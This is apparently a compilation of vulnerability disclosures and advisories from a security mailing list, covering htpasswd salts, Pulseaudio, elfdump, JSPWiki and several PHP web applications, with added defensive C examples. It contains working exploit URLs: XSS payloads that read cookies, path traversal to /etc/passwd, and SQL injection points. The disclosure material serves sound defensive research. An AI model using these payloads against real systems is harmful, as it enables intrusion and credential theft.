   all MD5 or CRYPT passwords.

2) Use an alternate tool for generating your password hashes. 
   Implementations of the CRYPT and "apr1" MD5 algorithms are available
   for various programming languages and platforms -- you don't need to
   use the inferior tool from the Apache project.

Solution:

htpasswd should at least use a more random seed for the srand() calls
so that rand() can produce less predictable salts. It should also, as
Andreas Krennmair noted, make full use of the 48-bit-wide salt capability 
of its "apr1" MD5 algorithm.

Patches:

Patches are available in Apache's "issues" database that correct both the 
weak seeding of srand() and, thanks to Andreas, the 36/48 bit salt size 
for MD5: 
  http://issues.apache.org/bugzilla/show_bug.cgi?id=31440

Here's sample output from a patched htpasswd utility:

$ htpasswd -nbm user1 pass1; htpasswd -nbm user2 pass2; \
  htpasswd -nbm user3 pass2
user1:$apr1$wMdual6C$4.JZNIEfbWvF7OKvpsTGO0
user2:$apr1$LCXYBrpM$6ypjd9FWcVjt6niwCHst71
user3:$apr1$7vefL1ic$6WdQmN9sMUQvQvMGVyHU//

The patch I submitted to the Apache group
 1) by default makes use of the /dev/urandom device that is available
on most modern open systems OSes 
 2) allows the user to specify another seed source (such as /dev/random)
via an environment variable
 3) prints a warning if it has to fall back to using time()

Users of Microsoft Windows or other target platforms that lack /dev/urandom
might want to improve on thi

etomite xss

Homepage: http://www.etomite.com/

Tested Version: 0.6.1 Final

Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill

This is a flaw because $_SERVER['PHP_INFO'] is being  trusted.

$_SERVER['PHP_INFO'] will contain this value when the exploit url is used:

/index.php/">alert("test")/fill

/fill is removed.


Trust no one.

Michael Brooks


[ GLSA 200802-07 ] Pulseaudio: Privilege escalation

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200802-07
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Pulseaudio: Privilege escalation
  Date: February 13, 2008
  Bugs: #207214
ID: 200802-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability in pulseaudio may allow a local user to execute actions
with escalated privileges.

Background
==

Pulseaudio is a networked sound server with an advanced plugin system.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-sound/pulseaudio   < 0.9.9 >= 0.9.9

Description
===

Marcus Meissner from SUSE reported that the pa_drop_root() function
does not properly check the return value of the system calls setuid(),
seteuid(), setresuid() and setreuid() when dropping its privileges.

Impact
==

A local attacker could cause a resource exhaustion to make the system
calls fail, which would cause Pulseaudio to run as root. The attacker
could then perform actions with root privileges.
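
Added example, not Pulseaudio's own code: the unchecked privilege-drop
pattern the advisory describes, next to a version that checks every return
value and then verifies the result independently. The function names and the
use of setgroups()/setgid()/setuid() are mine; the advisory names setuid(),
seteuid(), setresuid() and setreuid(), and the same fail-closed treatment
applies to whichever of them a daemon uses.

```c
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

/* Vulnerable pattern: both results are thrown away. When setuid() fails
   (a local user can provoke that on Linux by exhausting the target uid's
   process limit) the daemon keeps running as root without noticing. */
void drop_root_unchecked(uid_t uid, gid_t gid)
{
    setgid(gid);
    setuid(uid);
}

/* Independent verification: re-read the credentials instead of trusting
   the calls, and prove that root cannot be regained. Returns 1 if the
   process is fully and irreversibly running as uid/gid, otherwise 0. */
int privileges_dropped(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return 0;
    if (getgid() != gid || getegid() != gid)
        return 0;
    /* If a saved uid of 0 survived, this call would succeed. */
    if (uid != 0 && setuid(0) == 0)
        return 0;
    return 1;
}

/* Hardened drop: fail closed. Returns 0 only when every step succeeded and
   the result was verified; -1 (errno set by the failing call) otherwise. */
int drop_root_checked(uid_t uid, gid_t gid)
{
    /* Supplementary groups first, while we still have the privilege. */
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;
    /* Group before user: once the uid is unprivileged, gid cannot change. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (!privileges_dropped(uid, gid)) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(void)
{
    /* Demonstration target: our own ids, so the call succeeds for any user. */
    uid_t uid = getuid();
    gid_t gid = getgid();

    if (drop_root_checked(uid, gid) == 0)
        printf("dropped to uid=%u gid=%u and verified\n",
               (unsigned)uid, (unsigned)gid);
    else
        perror("drop_root_checked");

    /* Asking a non-root process to become root: the unchecked version
       reports nothing, the checked version fails loudly. */
    drop_root_unchecked(0, 0);
    printf("unchecked drop to root: still uid=%u, no error reported\n",
           (unsigned)getuid());
    if (drop_root_checked(0, 0) != 0)
        perror("drop_root_checked(0, 0) correctly failed");
    return 0;
}
```

Run as an ordinary user, the second half shows the difference the advisory is
about: the unchecked call silently leaves the process where it was, while the
checked one returns -1 with errno set.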

Workaround
==

There is no known workaround at this time.

Resolution
==

All Pulseaudio users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-sound/pulseaudio-0.9.9"

References
==

  [ 1 ] CVE-2008-0008
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0008

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200802-07.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHs3VAuhJ+ozIKI5gRArmoAJ9SCqxjbnAssnUt34QI8HtpLXzg8QCfQ1tl
25xRVcl7FL2lc0RTu8mGqgo=
=cDWF
-END PGP SIGNATURE-


Re: Vwar New Bug

Basically a dup of http://packetstormsecurity.org/0608-exploits/vwar150multi.txt


On Wed, Feb 13, 2008 at 10:50:53AM -, [EMAIL PROTECTED] wrote:
> Vendor : Www.Vwar.De
> Credits : Pouya_Server
> Vuln. Ver : v1.5.0
> Http://pouya-server.blogfa.com
> [EMAIL PROTECTED]
> ---
> http://[host]/vwar/war.php?s=[SQL]
> http://[host]/vwar/war.php?page=[SQL]
> http://[host]/vwar/war.php?showgame=[SQL]
> http://[host]/vwar/war.php?sortby=[SQL]


artmedic weblog multiple local file inclusion vulnerabilities


download: http://artmedic-phpscripts.de/index.php?did=artmedic_weblog.zip

author: muuratsalo
contact: muuratsalo[at]gmail.com

exploits:
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00


[DSECRG-08-011 | FIX INFORMATION] Astrosoft HelpDesk Multiple XSS


Digital Security Research Group [DSecRG] Advisory   #DSECRG-08-011 | FIX 
INFORMATION


Application:Astrosoft HelpDesk
Versions Affected:  < 1.95.228
Vendor URL: http://astrosoft.ru/
Bugs:   Multiple XSS Injections
Exploits:   YES
Reported:   29.01.2008
Date of Public Advisory:04.02.2008
Vendor response:05.02.2008
Updated Report: 14.02.2008
Solution:   HelpDesk was altered to fix this flaw on 
13.02.2008. Updated version - 1.95.228
Authors:Alexandr Polyakov, Stas Svistunovich
Digital Security Research Group [DSecRG] 
(research [at] dsec [dot] ru)


Contact:research [at] dsec [dot] ru
http://www.dsec.ru (in Russian)




ELFdump crash when analyzing crafted ELF file.

__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c, v 1.12.8.2 2006/01/28 18:40:55 marcel Exp $");

--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--


Advisory:

Software : elfdump
Version : 1.12.8.2 2006/01/28 18:40:55
Author : Jake Burkholder <[EMAIL PROTECTED]>
Remote : NO
Execution of code : NO
Privilege escalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <[EMAIL PROTECTED]>
Exploit by : INTECO-CERT - David Reguera Garcia <[EMAIL PROTECTED]>
Description : When elfdump analyzes an "evil" ELF, the application crashes
with "Segmentation fault: 11".

Affected OS:
- FreeBSD:
  - 5.5 - TESTED AND FOUND
  - 6.2 - TESTED AND FOUND
  - 6.3 - TESTED AND FOUND
  - Maybe others; the elfdump utility first appeared in FreeBSD 5.0


Technical information:

The problem resides in the use of le32dec, be32dec, etc. without validating
the input address.


Exploitation

An example of this exploitation is the following.

In the main function we can find the following call:

offset = elf_get_off(e, (char *)sh + shstrndx * shentsize, SH_OFFSET);

sh: mapped area with the evil ELF + e_shoff (offset of the section header table).
e_shoff, shstrndx and shentsize are used directly from the mapped ELF.

What is the problem? elf_get_off does not verify whether the address is out of
range. If e_shoff in the ELF is out of range, the application may crash:


#define elf_get_off elf_get_quad

u_int64_t
elf_get_quad(Elf32_Ehdr *e, void *base, elf_member_t member)
{
        u_int64_t val;

        val = 0;
        switch (e->e_ident[EI_CLASS]) {
        case ELFCLASS32:
                base = (char *)base + elf32_offsets[member];
                switch (e->e_ident[EI_DATA]) {
                case ELFDATA2MSB:
                        val = be32dec(base);
                        break;
                case ELFDATA2LSB:
                        val = le32dec(base);
                        break;
                case ELFDATANONE:
                        errx(1, "invalid data format");
                ...


When does it crash? It is easy: for example, an ELF whose e_ident[EI_CLASS] is
ELFCLASS32 and e_ident[EI_DATA] is ELFDATA2LSB makes it execute:

val = le32dec(base);

le32dec is this inline function:

static __inline uint32_t
le32dec(const void *pp)
{
        unsigned char const *p = (unsigned char const *)pp;

        return ((p[3] << 24) | (p[2] << 16) | (p[1] << 8) | p[0]);
}

This function accesses the memory at pp; if pp is not a readable address the
application crashes with "Segmentation fault: 11".

In other words, if we create an evil ELF with an evil e_shoff, the application
crashes. (It is also possible to craft an evil shstrndx, shentsize, ...)
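As an added example (not the advisory's or elfdump's code), a bounds-checked version of the lookup above: it recomputes the address (char *)sh + shstrndx * shentsize from e_shoff, e_shstrndx and e_shentsize and refuses the le32dec read when it would fall outside the mapped file, which is exactly the check elfdump lacks. The le32/le16 helpers, the SHDR32_SIZE/SH_OFFSET_OFF constants and the constructed 128-byte sample file are assumptions of the example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
/* Added example, not elfdump's code: fetch the section-name string table's
 * sh_offset as elfdump's main() does, but refuse any read that would leave
 * the mapped file. Only ELFCLASS32 / ELFDATA2LSB is handled. */
#define SHDR32_SIZE   40   /* sizeof(Elf32_Shdr); the ELF32 header is 52 */
#define SH_OFFSET_OFF 16   /* sh_offset lies 16 bytes into an Elf32_Shdr */

static uint32_t le32(const unsigned char *p)
{ return ((uint32_t)p[3] << 24) | ((uint32_t)p[2] << 16) | ((uint32_t)p[1] << 8) | p[0]; }
static uint16_t le16(const unsigned char *p) { return (uint16_t)((p[1] << 8) | p[0]); }
/* Returns 0 and stores sh_offset in *out, or -1 when e_shoff, e_shstrndx or
 * e_shentsize would put the read outside buf[0..len). */
int shstr_offset_checked(const unsigned char *buf, size_t len, uint32_t *out)
{
    uint64_t shoff, shentsize, shstrndx, shdr_at;
    if (len < 52 || memcmp(buf, "\x7f" "ELF", 4) != 0)
        return -1;                           /* truncated or not an ELF */
    if (buf[4] != 1 || buf[5] != 1)          /* EI_CLASS, EI_DATA */
        return -1;
    shoff     = le32(buf + 32);              /* e_shoff     */
    shentsize = le16(buf + 46);              /* e_shentsize */
    shstrndx  = le16(buf + 50);              /* e_shstrndx  */
    if (shentsize < SHDR32_SIZE)
        return -1;                           /* entry cannot hold sh_offset */
    shdr_at = shoff + shstrndx * shentsize;  /* 64-bit math, no wraparound */
    if (shdr_at + SHDR32_SIZE > len)         /* the check elfdump is missing */
        return -1;
    *out = le32(buf + shdr_at + SH_OFFSET_OFF);
    return 0;
}

/* Constructed 128-byte sample "file": minimal ELF32 LE header with the given
 * e_shoff, e_shentsize = 40, e_shstrndx = 0 (as in the advisory's PoC) and,
 * when it fits, one section header at e_shoff whose sh_offset is 0x34.
 * Returns the recovered sh_offset, or -1 when the read is rejected. */
long check_sample(uint32_t shoff)
{
    unsigned char f[128]; uint32_t off = 0;
    memset(f, 0, sizeof f);
    memcpy(f, "\x7f" "ELF\x01\x01\x01", 7);  /* magic, CLASS32, LSB, EV_CURRENT */
    f[32] = shoff & 0xff;         f[33] = (shoff >> 8) & 0xff;
    f[34] = (shoff >> 16) & 0xff; f[35] = (shoff >> 24) & 0xff;
    f[46] = SHDR32_SIZE;
    if ((uint64_t)shoff + SHDR32_SIZE <= sizeof f)
        f[shoff + SH_OFFSET_OFF] = 0x34;
    return shstr_offset_checked(f, sizeof f, &off) == 0 ? (long)off : -1;
}
```

With e_shoff = 16777215, the value the advisory's PoC writes, the checked version returns -1 instead of dereferencing an address far past the mapping.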


I created a POC exploit which creates an evil ELF to crash elfdump.
In this exploit the values of shstrndx and shentsize are filled with 0 for
simplicity.


Compile & execute:

[Dreg@ ~/vuln]# gcc -pedantic -ansi-c -o xpl xpl.c
[Dreg@ ~/vuln]# ./xpl -f pocdump && echo "-" && \
echo " Executing elfdump:" && elfdump -a pocdump

__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c,
v 1.12.8.2 2006/01/28 18:40:55 marcel Exp $");
--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--
Note: run it with -h parameter to show help.

Evil ELF written using e_shoff: 16777215, at: pocdump
Now, try elfdump -a pocdump
-
Executing elfdump:
Segmentation fault: 11 (core dumped)


Low level area

The ASM code of le32dec is:

loc_80488DC:
        movzx edx, byte ptr [ebx+3]
        movzx eax, byte ptr [ebx+2]
        shl eax, 10h
        shl edx, 18h
        or edx, eax
        movzx eax, byte ptr [ebx+1]
        shl eax, 8
        or edx, eax
        movzx eax, byte ptr [ebx]

If [EBX], [EBX+1], [EBX+2] or [EBX+3] is non-readable memory, the
application crashes.


Note

This POC exploit may crash the application at some other memory address than
0x80488DC as well, for example:

[Dreg@ ~/vuln]# ./xpl -o 20 -f petadump && echo "-" && \
echo " Executing elfdump:" && elfdump -a petadump

__FBSDID("$FreeBSD: src/usr.bin/elfdump/elfdump.c,
v 1.12.8.2 2006/01/28 18:40:55 marcel Exp $");
--
+ EVIL ELF GENERATOR FOR ELFDUMP - [EMAIL PROTECTED]
+ David Reguera Garcia - INTECO-CERT
--
Note: run it with -h parameter to show help.

Evil ELF written using e_shoff: 20, at: petadump
Now, try: elfdump -a petadump
-
Executing elfdump:

elf header:

Segmentation fault: 11 (core dumped)

In this case the application crashes at 0x28132f4f:

0x28132f4

JSPWiki Multiple Vulnerabilities


JSPWiki Multiple Vulnerabilities


Vendor:
Janne Jalkanen JSPWiki – http://www.jspwiki.org

Application Description:
From the JSPWiki website - "JSPWiki is a feature-rich and extensible
WikiWiki engine built around standard J2EE components (Java, servlets,
JSP)."


Tested versions:
JSPWiki v2.4.104
JSPWiki v2.5.139
Earlier versions may also be affected.

JSPWiki Local .jsp File Inclusion Vulnerability.
An input validation problem exists within JSPWiki which allows an attacker to
execute (include) arbitrary local .jsp files. An attacker may leverage
this issue to execute arbitrary server-side script code on a vulnerable
server with the privileges of the web server process.


Example (including rss.jsp file from the application root directory):
http://server/JSPWikiPath/Edit.jsp?page=Main&editor=../../../rss

Note: page parameter must be an existing page on the server.

This grants an attacker unauthorized access to sensitive .jsp files on 
the server and can lead to information disclosure.


Examples:
http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../Install
http://server/JSPWikiPath/Edit.jsp?page=User&editor=../../../admin/SecurityConfig

The first example discloses sensitive information such as the full path
of the application on the server, the page (and attachment) storage path,
log files and work directory by including the application installation
file (Install.jsp).
The second example discloses the application security configuration by
including the JSPWiki Security Configuration Verifier file
(admin/SecurityConfig.jsp).


In addition, JSPWiki allows users to upload (attach) files to entry
pages. An attacker can use the information disclosed by the installation
file to upload a malicious .jsp file and locally execute it.
By executing malicious server-side code, an attacker may be able to
compromise the server.



JSPWiki Cross-Site Scripting Vulnerability.
An attacker may leverage cross-site scripting vulnerability to have 
arbitrary script code executed in the browser of an unsuspecting user in 
the context of the affected site. This may facilitate the theft of 
cookie-based authentication credentials as well as other attacks.


Example:
http://server/JSPWikiPath/Edit.jsp?page=Main&editor=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original Document:
http://www.bugsec.com/articles.php?Security=48&Web-Application-Firewall=0

Download PDF:
http://www.bugsec.com/up_files/JSPWiki_Multiple_Vulnerabilities.pdf

Credit:
Moshe BA
BugSec LTD. - Security Consulting Company
Tel: +972-3-9622655
Fax: +972-3-9511433
Email: Info -at- BugSec -d0t- com
http://www.bugsec.com

--
Moshe :: Trancer
0nly Human.



Search Unleashed 0.2.10 JavaScript injection (Wordpress plugin)

Hello all,

There is a bug in "Log" function of Search Unleashed by John Godley,
version 0.2.10.

This plug-in stores search queries but does not validate the stored data
and puts it back "raw" to the browser.

HTML and JavaScript can be injected with a search request:
/blog/?s=%3Ctextarea+onmouseover%3D%22alert%28document.cookie%29%3B%22%3E%3C%2Ftextarea%3E&searchbutton=go%21

To execute the injected code the admin has to go to Manage -> Search
Unleashed -> Log (and, in my example, point his cursor at the text area).

Author was notified by his bug tracker:
http://urbangiraffe.com/tracker/issues/show/60

Regards,
-- 
Krzysztof Burghardt <[EMAIL PROTECTED]>
http://www.burghardt.pl/